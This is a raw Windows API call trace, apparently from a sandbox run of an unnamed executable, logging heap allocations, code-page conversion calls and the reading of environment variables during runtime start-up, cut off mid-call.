RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12a) returned 0x2e1af8 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7c) returned 0x2e1c30 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e1cb8 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3a) returned 0x2d24f8 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x90) returned 0x2e1cf8 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2daf90 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db5d8 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e1d90 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d70d0 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x52) returned 0x2e1dd0 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d2540 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x2e1e30 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db610 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x28) returned 0x2dafc0 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2dedb0 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2c) returned 0x2db648 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x54) returned 0x2e1f10 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x52) returned 0x2e1f70 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2c) returned 0x2db680 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x26) returned 0x2daff0 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d2588 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2db020 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db6b8 [0173.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x8c) returned 0x2e0078 [0173.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0bc8 | out: hHeap=0x2c0000) returned 1 [0173.320] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x800) returned 0x2e0110 [0173.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x80) returned 0x2e0918 [0173.339] GetLastError () returned 0x0 [0173.339] SetLastError (dwErrCode=0x0) [0173.339] GetLastError () returned 0x0 [0173.339] SetLastError (dwErrCode=0x0) [0173.339] GetLastError () returned 0x0 [0173.339] SetLastError (dwErrCode=0x0) [0173.340] GetACP () returned 0x4e4 [0173.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x220) returned 0x2e09a0 [0173.340] GetLastError () returned 0x0 [0173.340] SetLastError (dwErrCode=0x0) [0173.340] IsValidCodePage (CodePage=0x4e4) returned 1 [0173.340] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0173.370] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0173.381] GetLastError () returned 0x0 [0173.381] SetLastError (dwErrCode=0x0) [0173.381] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0173.392] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0173.392] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0173.392] GetLastError () returned 0x0 [0173.392] SetLastError (dwErrCode=0x0) [0173.392] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0173.392] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0173.404] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0173.404] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0173.404] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ§i¬æäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0173.404] GetLastError () returned 0x0 [0173.404] SetLastError (dwErrCode=0x0) [0173.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0173.404] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0173.404] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0173.404] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0173.404] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ§i¬æäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0173.416] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0173.416] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x0 [0173.416] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e0918) returned 0x80 [0173.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0173.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1f) returned 0x2dedd8 [0173.439] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2dedd8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0173.460] GetLastError () returned 0x0 [0173.460] SetLastError (dwErrCode=0x0) [0173.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x2d1ef0 [0173.460] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d1ef0) returned 0x4 [0173.460] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2d1ef0, Size=0x8) returned 0x2d1ef0 [0173.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0173.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2b) returned 0x2db6f0 [0173.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x2db6f0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 43 [0173.461] GetLastError () returned 0x0 [0173.461] SetLastError (dwErrCode=0x0) [0173.461] GetLastError () returned 0x0 [0173.461] SetLastError (dwErrCode=0x0) [0173.461] GetLastError () returned 0x0 [0173.461] SetLastError (dwErrCode=0x0) [0173.472] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2d1ef0) returned 0x8 [0173.472] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2d1ef0, Size=0xc) returned 0x2e1fd0 [0173.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0173.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x37) returned 0x2e1010 [0173.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2e1010, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0173.472] GetLastError () returned 0x0 [0173.472] SetLastError (dwErrCode=0x0) [0173.472] GetLastError () returned 0x0 [0173.472] SetLastError (dwErrCode=0x0) [0173.472] GetLastError () returned 0x0 [0173.472] SetLastError (dwErrCode=0x0) [0173.472] GetLastError () returned 0x0 [0173.472] SetLastError (dwErrCode=0x0) [0173.472] GetLastError () returned 0x0 [0173.472] SetLastError (dwErrCode=0x0) [0173.472] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1fd0) returned 0xc [0173.472] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1fd0, Size=0x10) returned 0x2e1fd0 [0173.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0173.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d25d0 [0173.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2d25d0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0173.473] GetLastError () returned 0x0 [0173.473] SetLastError (dwErrCode=0x0) [0173.473] GetLastError () returned 0x0 [0173.473] SetLastError (dwErrCode=0x0) [0173.473] GetLastError () returned 0x0 [0173.473] SetLastError (dwErrCode=0x0) [0173.473] GetLastError () returned 0x0 [0173.473] SetLastError (dwErrCode=0x0) [0173.473] GetLastError () returned 0x0 [0173.473] SetLastError (dwErrCode=0x0) [0173.473] GetLastError () returned 0x0 [0173.473] SetLastError (dwErrCode=0x0) [0173.473] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1fd0) returned 0x10 [0173.474] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1fd0, Size=0x14) returned 0x2e1050 [0173.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0173.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x31) returned 0x2e1070 [0173.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2e1070, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] GetLastError () returned 0x0 [0173.474] SetLastError (dwErrCode=0x0) [0173.474] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1050) returned 0x14 [0173.474] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1050, Size=0x18) returned 0x2e1050 [0173.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0173.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e10b0 [0173.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=Q9IATRKPRH", 